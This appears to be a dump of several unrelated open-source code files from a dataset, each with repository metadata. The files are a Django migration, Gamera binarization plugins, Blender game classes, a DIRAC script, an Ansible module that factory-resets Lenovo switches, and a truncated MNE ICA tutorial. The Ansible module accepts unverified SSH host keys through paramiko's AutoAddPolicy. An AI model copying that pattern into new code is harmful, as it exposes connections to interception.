'clinic': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'pcms'", 'null': 'True', 'to': u"orm['core.Clinic']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'msisdn': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pcms'", 'to': u"orm['core.MSISDN']"}),
'notes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'reason': ('django.db.models.fields.CharField', [], {'default': "'ot'", 'max_length': '2'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'core.visit': {
'Meta': {'ordering': "['date']", 'object_name': 'Visit'},
'clinic': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Clinic']"}),
'comment': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {'db_index': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'patient': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Patient']"}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'te_visit_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'visit_type': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True', 'blank': 'True'}),
'wrhi_orig_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'db_index': 'True'})
}
}
complete_apps = ['core']
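
# --- Usage note (appended for illustration) ---
# Applying this migration (assumes a South-era Django project with the
# 'core' app installed; 0023 matches this file's number prefix):
#
#   ./manage.py migrate core 0023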
|
praekelt/txtalert
|
txtalert/core/migrations/0023_auto__add_index_visit_wrhi_orig_date__add_index_visit_date__add_index_.py
|
Python
|
gpl-3.0
| 17,476
|
[
"VisIt"
] |
60fa4402a27da64aa25be51eca01089438c72000750df7255fa2476d3f039c64
|
#
# Copyright (C) 2005 John Ashley Burgoyne and Ichiro Fujinaga
# 2012 Andrew Hankinson
# 2011-2012 Christoph Dalitz
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# TODO: Add GREY16 compatibility.
# TODO: Add Yanowitz and Bruckstein post-processing (a la Trier and Jain).
"""Adaptive binarization tools."""
from gamera.plugin import *
from gamera.args import NoneDefault
import _binarization
class image_mean(PluginFunction):
"""
Returns the mean over all pixels of an image as a FLOAT.
"""
category = "Binarization/RegionInformation"
return_type = Real("output")
self_type = ImageType([GREYSCALE,GREY16,FLOAT])
def __call__(self):
return _binarization.image_mean(self)
__call__ = staticmethod(__call__)
class image_variance(PluginFunction):
"""
Returns the variance over all pixels of an image as a FLOAT.
"""
category = "Binarization/RegionInformation"
return_type = Real("output")
self_type = ImageType([GREYSCALE,GREY16,FLOAT])
def __call__(self):
return _binarization.image_variance(self)
__call__ = staticmethod(__call__)
class mean_filter(PluginFunction):
"""
Returns the regional mean of an image as a FLOAT.
*region_size*
The size of the region in which to calculate a mean.
"""
category = "Binarization/RegionInformation"
return_type = ImageType([FLOAT], "output")
self_type = ImageType([GREYSCALE,GREY16,FLOAT])
args = Args([Int("region size", default=5)])
doc_examples = [(GREYSCALE,), (GREY16,), (FLOAT,)]
def __call__(self, region_size=5):
return _binarization.mean_filter(self, region_size)
__call__ = staticmethod(__call__)
class variance_filter(PluginFunction):
"""
Returns the regional variance of an image as a FLOAT.
*means*
Pre-calculated means for each region.
*region_size*
The size of the region in which to calculate the variance.
"""
category = "Binarization/RegionInformation"
return_type = ImageType([FLOAT], "output")
self_type = ImageType([GREYSCALE,GREY16,FLOAT])
args = Args([ImageType([FLOAT], "means"),
Int("region size", default=5)])
def __call__(self, means, region_size=5):
return _binarization.variance_filter(self, means, region_size)
__call__ = staticmethod(__call__)
class wiener_filter(PluginFunction):
"""
Adaptive Wiener filter for de-noising.
See:
J. Lim. 2001. *Two-Dimensional Signal Processing.* Englewood
Cliffs: Prentice Hall.
*region_size*
The size of the region within which to calculate the filter
coefficients.
*noise_variance*
Variance of the noise in the image. If negative, estimated
automatically as the median of local variances.
"""
category = "Filter"
return_type = ImageType([GREYSCALE,GREY16,FLOAT], "output")
self_type = ImageType([GREYSCALE,GREY16,FLOAT])
args = Args([Int("region size", default=5),
Real("noise variance", default=-1.0)])
doc_examples = [(GREYSCALE,), (GREY16,), (FLOAT,)]
def __call__(self, region_size=5, noise_variance=-1):
return _binarization.wiener_filter(self, region_size, noise_variance)
__call__ = staticmethod(__call__)
class niblack_threshold(PluginFunction):
"""
Creates a binary image using Niblack's adaptive algorithm.
Niblack, W. 1986. *An Introduction to Digital Image Processing.* Englewood
Cliffs, NJ: Prentice Hall.
Like the QGAR library, there are two extra global thresholds for
the lightest and darkest regions.
*region_size*
The size of the region in which to calculate a threshold.
*sensitivity*
The sensitivity weight on the variance.
*lower bound*
A global threshold beneath which all pixels are considered black.
*upper bound*
A global threshold above which all pixels are considered white.
"""
return_type = ImageType([ONEBIT], "output")
self_type = ImageType([GREYSCALE])
args = Args([Int("region size", default=15),
Real("sensitivity", default=-0.2),
Int("lower bound", range=(0,255), default=20),
Int("upper bound", range=(0,255), default=150)])
doc_examples = [(GREYSCALE,)]
def __call__(self,
region_size=15,
sensitivity=-0.2,
lower_bound=20,
upper_bound=150):
return _binarization.niblack_threshold(self,
region_size,
sensitivity,
lower_bound,
upper_bound)
__call__ = staticmethod(__call__)
class sauvola_threshold(PluginFunction):
"""
Creates a binary image using Sauvola's adaptive algorithm.
Sauvola, J. and M. Pietikainen. 2000. Adaptive document image
binarization. *Pattern Recognition* 33: 225--236.
Like the QGAR library, there are two extra global thresholds for
the lightest and darkest regions.
*region_size*
The size of the region in which to calculate a threshold.
*sensitivity*
The sensitivity weight on the adjusted variance.
*dynamic_range*
The dynamic range of the variance.
*lower bound*
A global threshold beneath which all pixels are considered black.
*upper bound*
A global threshold above which all pixels are considered white.
"""
return_type = ImageType([ONEBIT], "output")
self_type = ImageType([GREYSCALE])
args = Args([Int("region size", default=15),
Real("sensitivity", default=0.5),
Int("dynamic range", range=(1, 255), default=128),
Int("lower bound", range=(0,255), default=20),
Int("upper bound", range=(0,255), default=150)])
doc_examples = [(GREYSCALE,)]
def __call__(self,
region_size=15,
sensitivity=0.5,
dynamic_range=128,
lower_bound=20,
upper_bound=150):
return _binarization.sauvola_threshold(self,
region_size,
sensitivity,
dynamic_range,
lower_bound,
upper_bound)
__call__ = staticmethod(__call__)
class gatos_background(PluginFunction):
"""
Estimates the background of an image according to Gatos et al.'s
method. See:
Gatos, Basilios, Ioannis Pratikakis, and Stavros
J. Perantonis. 2004. An adaptive binarization technique for low
quality historical documents. *Lecture Notes in Computer
Science* 3163: 102--113.
*region_size*
Region size for interpolation.
*binarization*
A preliminary binarization of the image.
"""
category = "Binarization/RegionInformation"
return_type = ImageType([GREYSCALE], "output")
self_type = ImageType([GREYSCALE])
args = Args([ImageType([ONEBIT], "binarization"),
Int("region size", default=15)])
def __call__(self, binarization, region_size=15):
return _binarization.gatos_background(self, binarization, region_size)
__call__ = staticmethod(__call__)
class gatos_threshold(PluginFunction):
"""
Thresholds an image according to Gatos et al.'s method. See:
Gatos, Basilios, Ioannis Pratikakis, and Stavros
J. Perantonis. 2004. An adaptive binarization technique for low
quality historical documents. *Lecture Notes in Computer
Science* 3163: 102--113.
*background*
Estimated background of the image.
*binarization*
A preliminary binarization of the image.
Use the default settings for the other parameters unless you know
what you are doing.
"""
return_type = ImageType([ONEBIT], "output")
self_type = ImageType([GREYSCALE])
args = Args([ImageType([GREYSCALE], "background"),
ImageType([ONEBIT], "binarization"),
Real("q", default=0.6),
Real("p1", default=0.5),
Real("p2", default=0.8)])
def __call__(self, background, binarization, q=0.6, p1=0.5, p2=0.8):
return _binarization.gatos_threshold(self,
background,
binarization,
q,
p1,
p2)
__call__ = staticmethod(__call__)
class white_rohrer_threshold(PluginFunction):
"""
Creates a binary image using White and Rohrer's dynamic thresholding
algorithm. It is the first of the two algorithms described in:
J. M. White and G. D. Rohrer. 1983. Image thresholding for optical
character recognition and other applications requiring character
image extraction. *IBM J. Res. Dev.* 27(4), pp. 400-411
The algorithm uses a 'running' average instead of the true average of
the gray values in the neighborhood. The lookahead parameter
gives the number of lookahead pixels used in the biased running
average that is used in deciding the threshold at each pixel
location.
*x_lookahead*
the number of lookahead pixels in the horizontal direction for
computing the running average. White and Rohrer suggest a value
of 8 for a 240 dpi scanning resolution.
*y_lookahead*
number of lines used for further averaging from the horizontal
averages.
The other parameters are for calculating biased running average.
Without bias the thresholding decision would be determined by
noise fluctuations in uniform areas.
This implementation uses code from XITE__.
.. __: http://www.ifi.uio.no/forskning/grupper/dsb/Software/Xite/
.. note::
Permission to use, copy, modify and distribute this software
and its documentation for any purpose and without fee is hereby
granted, provided that this copyright notice appear in all
copies and that both that copyright notice and this permission
notice appear in supporting documentation and that the name of
B-lab, Department of Informatics or University of Oslo not be
used in advertising or publicity pertaining to distribution of
the software without specific, written prior permission.
B-LAB DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS, IN NO EVENT SHALL B-LAB BE LIABLE FOR ANY SPECIAL,
INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER
RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION,
ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF
THIS SOFTWARE.
"""
return_type = ImageType([ONEBIT], "onebit")
self_type = ImageType([GREYSCALE])
args = Args([Int("x lookahead", default=8),
Int("y lookahead", default=1),
Int("bias mode", default=0),
Int("bias factor", default=100),
Int("f factor",default=100),
Int("g factor",default=100)])
author = "Uma Kompella (using code from the XITE library)"
doc_examples = [(GREYSCALE,)]
def __call__(self, x_lookahead=8, y_lookahead=1, bias_mode=0,
bias_factor=100, f_factor=100, g_factor=100):
return _binarization.white_rohrer_threshold(
self,
x_lookahead,
y_lookahead,
bias_mode,
bias_factor,
f_factor,
g_factor)
__call__ = staticmethod(__call__)
class shading_subtraction(PluginFunction):
"""
Thresholds an image after subtracting a (possibly shaded) background.
First the background image is extracted with a maximum filter with a
*k\*k* window, and this image is subtracted from the original image.
On the difference image, a threshold is applied, and the inverted
image thereof is the binarization result.
Parameters:
*k*
Window size of the maximum filter. Must be odd. For decent results,
it must be chosen so large that every window includes at least one
background pixel.
*threshold*
Threshold applied to the difference image. A possibly reasonable
value might lie around 20. When ``None``, the threshold is
determined automatically with otsu_find_threshold_.
.. _otsu_find_threshold: binarization.html#otsu-find-threshold
Reference: K.D. Toennies: *Grundlagen der Bildverarbeitung.*
Pearson Studium, 2005, p.202
"""
author = "Christoph Dalitz"
return_type = ImageType([ONEBIT], "onebit")
self_type = ImageType([GREYSCALE])
args = Args([Int("k", default=7), Int("threshold", default=NoneDefault)])
pure_python = True
doc_examples = [(GREYSCALE,)]
def __call__(self, k=7, threshold=None):
#background = self.rank(k*k,k,border_treatment=1)
background = self.min_max_filter(k,1)
backfloat = background.to_float()
imgfloat = self.to_float()
difffloat = backfloat.subtract_images(imgfloat)
if threshold is None:
diffgrey = difffloat.to_greyscale()
diffgrey.invert()
return diffgrey.otsu_threshold()
else:
onebit = difffloat.threshold(threshold)
onebit.invert()
return onebit
__call__ = staticmethod(__call__)
class brink_threshold(PluginFunction):
"""
Calculates threshold for image with Brink and Pendock's minimum-cross
entropy method and returns corrected image. It is best used for binarising
images with dark, near-black foreground and significant bleed-through.
To that end, it generally predicts lower thresholds than other
thresholding algorithms.
Reference: A.D. Brink, N.E. Pendock: Minimum cross-entropy threshold selection.
Pattern Recognition 29 (1), 1996. 179-188.
"""
author = "Johanna Devaney, Brian Stern"
self_type = ImageType([GREYSCALE])
return_type = ImageType([ONEBIT], "onebit")
doc_examples = [(GREYSCALE,)]
def __call__(self):
return _binarization.brink_threshold(self)
__call__ = staticmethod(__call__)
class BinarizationGenerator(PluginModule):
category = "Binarization"
cpp_headers = ["binarization.hpp"]
functions = [image_mean,
image_variance,
mean_filter,
variance_filter,
wiener_filter,
niblack_threshold,
sauvola_threshold,
gatos_background,
gatos_threshold,
white_rohrer_threshold,
shading_subtraction,
brink_threshold]
author = "John Ashley Burgoyne and Ichiro Fujinaga"
url = "http://gamera.sourceforge.net/"
module = BinarizationGenerator()
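
# --- Hedged usage sketch (appended for illustration) ---
# Assumes Gamera is installed and 'page.png' names an existing greyscale
# scan (both the file name and running outside the Gamera GUI are
# assumptions about the caller's environment):
def _sketch_binarize(path="page.png"):
    from gamera.core import init_gamera, load_image
    init_gamera()
    img = load_image(path)  # must be GREYSCALE for the plugins above
    return img.niblack_threshold(region_size=15)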
|
hsnr-gamera/gamera
|
gamera/plugins/binarization.py
|
Python
|
gpl-2.0
| 15,930
|
[
"Brian"
] |
aaafd2da41c685f82230f9aebaf979351730b4fb908c0fe73b08723564d21786
|
import bge


class Ressource(bge.types.KX_GameObject):
    """Base class for harvestable resources.

    ``parent`` is the plain KX_GameObject being turned into this subclass;
    instantiating a KX_GameObject subclass with an existing object replaces
    it in place, so only game data is set here.
    """
    def __init__(self, parent):
        self.material = 10000  # units of raw material left to harvest


class Mine(Ressource):
    def __init__(self, parent):
        super(Mine, self).__init__(parent)
        self.material = 10000  # kept for per-type tuning; same as base for now


class Tree(Ressource):
    def __init__(self, parent):
        super(Tree, self).__init__(parent)
        self.material = 10000


class Crystal(Ressource):
    def __init__(self, parent):
        super(Crystal, self).__init__(parent)
        self.material = 10000
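
# --- Hedged usage sketch (appended for illustration) ---
# In the BGE, instantiating a KX_GameObject subclass with an existing
# object replaces (mutates) that object in place.  How these classes are
# wired to a Python controller is an assumption about the scene setup:
def make_mine(cont):
    own = cont.owner      # plain KX_GameObject owning the controller
    mine = Mine(own)      # mutate it into a Mine
    print(mine.material)  # -> 10000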
|
folkrav/rts-b51
|
src/projectX/ressource.py
|
Python
|
gpl-3.0
| 519
|
[
"CRYSTAL"
] |
aafd27a6f9b1ec82498e179176767ec6203030f78643723694074d6193dcde48
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
#
# Copyright (C) 2017 Lenovo, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Module to Reset to factory settings of Lenovo Switches
# Lenovo Networking
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cnos_factory
author: "Anil Kumar Muraleedharan (@amuraleedhar)"
short_description: Reset the switch's startup configuration to default (factory) on devices running Lenovo CNOS
description:
- This module allows you to reset a switch's startup configuration. The method provides a way to reset the
startup configuration to its factory settings. This is helpful when you want to move the switch to another
topology as a new network device.
This module uses SSH to manage network device configuration.
The results of the operation can be viewed in results directory.
For more information about this module from Lenovo and customizing it usage for your
use cases, please visit U(http://systemx.lenovofiles.com/help/index.jsp?topic=%2Fcom.lenovo.switchmgt.ansible.doc%2Fcnos_factory.html)
version_added: "2.3"
extends_documentation_fragment: cnos
options: {}
'''
EXAMPLES = '''
Tasks : The following are examples of using the module cnos_factory. These are written in the main.yml file of the tasks directory.
---
- name: Test Reset to factory
cnos_factory:
host: "{{ inventory_hostname }}"
username: "{{ hostvars[inventory_hostname]['ansible_ssh_user'] }}"
password: "{{ hostvars[inventory_hostname]['ansible_ssh_pass'] }}"
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
outputfile: "./results/test_factory_{{ inventory_hostname }}_output.txt"
'''
RETURN = '''
msg:
description: Success or failure message
returned: always
type: string
sample: "Switch Startup Config is Reset to factory settings"
'''
import sys
try:
import paramiko
HAS_PARAMIKO = True
except ImportError:
HAS_PARAMIKO = False
import time
import socket
import array
import json
import re
try:
from ansible.module_utils.network.cnos import cnos
HAS_LIB = True
except:
HAS_LIB = False
from ansible.module_utils.basic import AnsibleModule
from collections import defaultdict
def main():
module = AnsibleModule(
argument_spec=dict(
outputfile=dict(required=True),
host=dict(required=True),
username=dict(required=True),
password=dict(required=True, no_log=True),
enablePassword=dict(required=False, no_log=True),
deviceType=dict(required=True),),
supports_check_mode=False)
username = module.params['username']
password = module.params['password']
enablePassword = module.params['enablePassword']
cliCommand = "save erase \n"
outputfile = module.params['outputfile']
hostIP = module.params['host']
deviceType = module.params['deviceType']
output = ""
if not HAS_PARAMIKO:
module.fail_json(msg='paramiko is required for this module')
# Create instance of SSHClient object
remote_conn_pre = paramiko.SSHClient()
# Automatically add untrusted hosts (make sure okay for security policy in your environment)
remote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# initiate SSH connection with the switch
remote_conn_pre.connect(hostIP, username=username, password=password)
time.sleep(2)
# Use invoke_shell to establish an 'interactive session'
remote_conn = remote_conn_pre.invoke_shell()
time.sleep(2)
# Enable and enter configure terminal then send command
output = output + cnos.waitForDeviceResponse("\n", ">", 2, remote_conn)
output = output + cnos.enterEnableModeForDevice(enablePassword, 3, remote_conn)
# Make terminal length = 0
output = output + cnos.waitForDeviceResponse("terminal length 0\n", "#", 2, remote_conn)
# cnos.debugOutput(cliCommand)
# Send the CLi command
output = output + cnos.waitForDeviceResponse(cliCommand, "[n]", 2, remote_conn)
output = output + cnos.waitForDeviceResponse("y" + "\n", "#", 2, remote_conn)
# Save it into the file
file = open(outputfile, "a")
file.write(output)
file.close()
errorMsg = cnos.checkOutputForError(output)
if(errorMsg is None):
module.exit_json(changed=True, msg="Switch Startup Config is Reset to factory settings ")
else:
module.fail_json(msg=errorMsg)
if __name__ == '__main__':
main()
|
hryamzik/ansible
|
lib/ansible/modules/network/cnos/cnos_factory.py
|
Python
|
gpl-3.0
| 5,299
|
[
"VisIt"
] |
a0ef776eb2c2ef0ac85d6475230556d46b754003bb70381427cd20be198a1389
|
#!/usr/bin/env python
########################################################################
# File : dirac-wms-cpu-normalization
# Author : Ricardo Graciani
########################################################################
"""
Determine Normalization for current CPU
"""
__RCSID__ = "$Id$"
import DIRAC
from DIRAC.Core.Base import Script
Script.registerSwitch( "U", "Update", "Update dirac.cfg with the resulting value" )
Script.registerSwitch( "R:", "Reconfig=", "Update given configuration file with the resulting value" )
Script.setUsageMessage( '\n'.join( [ __doc__.split( '\n' )[1],
'Usage:',
' %s [option|cfgfile] ' % Script.scriptName ] ) )
Script.parseCommandLine( ignoreErrors = True )
update = False
configFile = None
for unprocSw in Script.getUnprocessedSwitches():
if unprocSw[0] in ( "U", "Update" ):
update = True
elif unprocSw[0] in ( "R", "Reconfig" ):
configFile = unprocSw[1]
if __name__ == "__main__":
from DIRAC.WorkloadManagementSystem.Client.CPUNormalization import getCPUNormalization
result = getCPUNormalization()
  if not result['OK']:
    DIRAC.gLogger.error( result['Message'] )
    DIRAC.exit( 1 )  # result['Value'] is absent on failure, so bail out here
norm = int( ( result['Value']['NORM'] + 0.05 ) * 10 ) / 10.
DIRAC.gLogger.notice( 'Normalization for current CPU is %.1f %s' % ( norm, result['Value']['UNIT'] ) )
if update:
DIRAC.gConfig.setOptionValue( '/LocalSite/CPUScalingFactor', norm )
DIRAC.gConfig.setOptionValue( '/LocalSite/CPUNormalizationFactor', norm )
DIRAC.gConfig.dumpLocalCFGToFile( DIRAC.gConfig.diracConfigFilePath )
if configFile:
from DIRAC.Core.Utilities.CFG import CFG
cfg = CFG()
    try:
      # Attempt to open the given file; fall back to an empty CFG if it
      # cannot be read or parsed
      cfg.loadFromFile( configFile )
    except Exception:
      pass
# Create the section if it does not exist
if not cfg.existsKey( 'LocalSite' ):
cfg.createNewSection( 'LocalSite' )
cfg.setOption( '/LocalSite/CPUScalingFactor', norm )
cfg.setOption( '/LocalSite/CPUNormalizationFactor', norm )
cfg.writeToFile( configFile )
DIRAC.exit()
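
# --- Usage sketch (appended for illustration; assumes a configured
# DIRAC client environment so Script.parseCommandLine succeeds):
#
#   dirac-wms-cpu-normalization            # print the normalization only
#   dirac-wms-cpu-normalization -U         # also update dirac.cfg
#   dirac-wms-cpu-normalization -R my.cfg  # write the value into my.cfg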
|
sposs/DIRAC
|
WorkloadManagementSystem/scripts/dirac-wms-cpu-normalization.py
|
Python
|
gpl-3.0
| 2,118
|
[
"DIRAC"
] |
59ebb5d9fa3d99f3d94d00d899f390faa830c60292ff9277eaaee3d131b3bc09
|
# -*- coding: utf-8 -*-
"""
.. _tut-artifact-ica:
Repairing artifacts with ICA
============================
This tutorial covers the basics of independent components analysis (ICA) and
shows how ICA can be used for artifact repair; an extended example illustrates
repair of ocular and heartbeat artifacts. For conceptual background on ICA, see
:ref:`this scikit-learn tutorial
<sphx_glr_auto_examples_decomposition_plot_ica_blind_source_separation.py>`.
We begin as always by importing the necessary Python modules and loading some
:ref:`example data <sample-dataset>`. Because ICA can be computationally
intense, we'll also crop the data to 60 seconds; and to save ourselves from
repeatedly typing ``mne.preprocessing`` we'll directly import a few functions
and classes from that submodule:
"""
# %%
import os
import mne
from mne.preprocessing import (ICA, create_eog_epochs, create_ecg_epochs,
corrmap)
sample_data_folder = mne.datasets.sample.data_path()
sample_data_raw_file = os.path.join(sample_data_folder, 'MEG', 'sample',
'sample_audvis_raw.fif')
raw = mne.io.read_raw_fif(sample_data_raw_file)
raw.crop(tmax=60.)
# %%
# .. note::
# Before applying ICA (or any artifact repair strategy), be sure to observe
# the artifacts in your data to make sure you choose the right repair tool.
# Sometimes the right tool is no tool at all — if the artifacts are small
# enough you may not even need to repair them to get good analysis results.
# See :ref:`tut-artifact-overview` for guidance on detecting and
# visualizing various types of artifact.
#
# What is ICA?
# ^^^^^^^^^^^^
#
# Independent components analysis (ICA) is a technique for estimating
# independent source signals from a set of recordings in which the source
# signals were mixed together in unknown ratios. A common example of this is
# the problem of `blind source separation`_: with 3 musical instruments playing
# in the same room, and 3 microphones recording the performance (each picking
# up all 3 instruments, but at varying levels), can you somehow "unmix" the
# signals recorded by the 3 microphones so that you end up with a separate
# "recording" isolating the sound of each instrument?
#
# It is not hard to see how this analogy applies to EEG/MEG analysis: there are
# many "microphones" (sensor channels) simultaneously recording many
# "instruments" (blinks, heartbeats, activity in different areas of the brain,
# muscular activity from jaw clenching or swallowing, etc). As long as these
# various source signals are `statistically independent`_ and non-Gaussian, it
# is usually possible to separate the sources using ICA, and then re-construct
# the sensor signals after excluding the sources that are unwanted.
#
#
# ICA in MNE-Python
# ~~~~~~~~~~~~~~~~~
#
# .. sidebar:: ICA and dimensionality reduction
#
# If you want to perform ICA with *no* dimensionality reduction (other than
# the number of Independent Components (ICs) given in ``n_components``, and
# any subsequent exclusion of ICs you specify in ``ICA.exclude``), simply
# pass ``n_components``.
#
# However, if you *do* want to reduce dimensionality, consider this
# example: if you have 300 sensor channels and you set ``n_components=50``
# during instantiation and pass ``n_pca_components=None`` to
#     `~mne.preprocessing.ICA.apply`, then the first 50
# PCs are sent to the ICA algorithm (yielding 50 ICs), and during
# reconstruction `~mne.preprocessing.ICA.apply` will use the 50 ICs
# plus PCs number 51-300 (the full PCA residual). If instead you specify
# ``n_pca_components=120`` in `~mne.preprocessing.ICA.apply`, it will
# reconstruct using the 50 ICs plus the first 70 PCs in the PCA residual
# (numbers 51-120), thus discarding the smallest 180 components.
#
# **If you have previously been using EEGLAB**'s ``runica()`` and are
# looking for the equivalent of its ``'pca', n`` option to reduce
# dimensionality, set ``n_components=n`` during initialization and pass
# ``n_pca_components=n`` to `~mne.preprocessing.ICA.apply`.
#
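# A hedged sketch of the reconstruction choices described in the sidebar
# above (``inst`` stands in for a Raw or Epochs object, so the calls are
# shown commented rather than executed)::
#
#     ica = ICA(n_components=50).fit(inst)
#     ica.apply(inst)                          # 50 ICs + full PCA residual
#     ica.apply(inst, n_pca_components=120)    # 50 ICs + PCs 51-120
#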
# MNE-Python implements three different ICA algorithms: ``fastica`` (the
# default), ``picard``, and ``infomax``. FastICA and Infomax are both in fairly
# widespread use; Picard is a newer (2017) algorithm that is expected to
# converge faster than FastICA and Infomax, and is more robust than other
# algorithms in cases where the sources are not completely independent, which
# typically happens with real EEG/MEG data. See
# :footcite:`AblinEtAl2018` for more information.
#
# The ICA interface in MNE-Python is similar to the interface in
# `scikit-learn`_: some general parameters are specified when creating an
# `~mne.preprocessing.ICA` object, then the `~mne.preprocessing.ICA` object is
# fit to the data using its `~mne.preprocessing.ICA.fit` method. The results of
# the fitting are added to the `~mne.preprocessing.ICA` object as attributes
# that end in an underscore (``_``), such as ``ica.mixing_matrix_`` and
# ``ica.unmixing_matrix_``. After fitting, the ICA component(s) that you want
# to remove must be chosen, and the ICA fit must then be applied to the
# `~mne.io.Raw` or `~mne.Epochs` object using the `~mne.preprocessing.ICA`
# object's `~mne.preprocessing.ICA.apply` method.
#
# As is typically done with ICA, the data are first scaled to unit variance and
# whitened using principal components analysis (PCA) before performing the ICA
# decomposition. This is a two-stage process:
#
# 1. To deal with different channel types having different units
# (e.g., Volts for EEG and Tesla for MEG), data must be pre-whitened.
# If ``noise_cov=None`` (default), all data of a given channel type is
# scaled by the standard deviation across all channels. If ``noise_cov`` is
# a `~mne.Covariance`, the channels are pre-whitened using the covariance.
# 2. The pre-whitened data are then decomposed using PCA.
#
# From the resulting principal components (PCs), the first ``n_components`` are
# then passed to the ICA algorithm if ``n_components`` is an integer number.
# It can also be a float between 0 and 1, specifying the **fraction** of
# explained variance that the PCs should capture; the appropriate number of
# PCs (i.e., just as many PCs as are required to explain the given fraction
# of total variance) is then passed to the ICA.
#
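# %%
# As a quick illustration of the two forms of ``n_components`` described
# above (nothing is fitted here; the 0.99 threshold is an arbitrary
# example value):

ica_int = ICA(n_components=15)     # pass exactly the first 15 PCs to ICA
ica_frac = ICA(n_components=0.99)  # as many PCs as explain 99% of variance

# %%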
# After visualizing the Independent Components (ICs) and excluding any that
# capture artifacts you want to repair, the sensor signal can be reconstructed
# using the `~mne.preprocessing.ICA` object's
# `~mne.preprocessing.ICA.apply` method. By default, signal
# reconstruction uses all of the ICs (less any ICs listed in ``ICA.exclude``)
# plus all of the PCs that were not included in the ICA decomposition (i.e.,
# the "PCA residual"). If you want to reduce the number of components used at
# the reconstruction stage, it is controlled by the ``n_pca_components``
# parameter (which will in turn reduce the rank of your data; by default
# ``n_pca_components=None`` resulting in no additional dimensionality
# reduction). The fitting and reconstruction procedures and the
# parameters that control dimensionality at various stages are summarized in
# the diagram below:
#
#
# .. raw:: html
#
# <a href=
# "../../_images/graphviz-7483cb1cf41f06e2a4ef451b17f073dbe584ba30.png">
#
# .. graphviz:: ../../_static/diagrams/ica.dot
# :alt: Diagram of ICA procedure in MNE-Python
# :align: left
#
# .. raw:: html
#
# </a>
#
# See the Notes section of the `~mne.preprocessing.ICA` documentation
# for further details. Next we'll walk through an extended example that
# illustrates each of these steps in greater detail.
#
# Example: EOG and ECG artifact repair
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#
# Visualizing the artifacts
# ~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Let's begin by visualizing the artifacts that we want to repair. In this
# dataset they are big enough to see easily in the raw data:
# pick some channels that clearly show heartbeats and blinks
regexp = r'(MEG [12][45][123]1|EEG 00.)'
artifact_picks = mne.pick_channels_regexp(raw.ch_names, regexp=regexp)
raw.plot(order=artifact_picks, n_channels=len(artifact_picks),
show_scrollbars=False)
# %%
# We can get a summary of how the ocular artifact manifests across each channel
# type using `~mne.preprocessing.create_eog_epochs` like we did in the
# :ref:`tut-artifact-overview` tutorial:
eog_evoked = create_eog_epochs(raw).average()
eog_evoked.apply_baseline(baseline=(None, -0.2))
eog_evoked.plot_joint()
# %%
# Now we'll do the same for the heartbeat artifacts, using
# `~mne.preprocessing.create_ecg_epochs`:
ecg_evoked = create_ecg_epochs(raw).average()
ecg_evoked.apply_baseline(baseline=(None, -0.2))
ecg_evoked.plot_joint()
# %%
# Filtering to remove slow drifts
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Before we run the ICA, an important step is filtering the data to remove
# low-frequency drifts, which can negatively affect the quality of the ICA fit.
# The slow drifts are problematic because they reduce the independence of the
# assumed-to-be-independent sources (e.g., during a slow upward drift, the
# neural, heartbeat, blink, and other muscular sources will all tend to have
# higher values), making it harder for the algorithm to find an accurate
# solution. A high-pass filter with 1 Hz cutoff frequency is recommended.
# However, because filtering is a linear operation, the ICA solution found from
# the filtered signal can be applied to the unfiltered signal (see
# :footcite:`WinklerEtAl2015` for
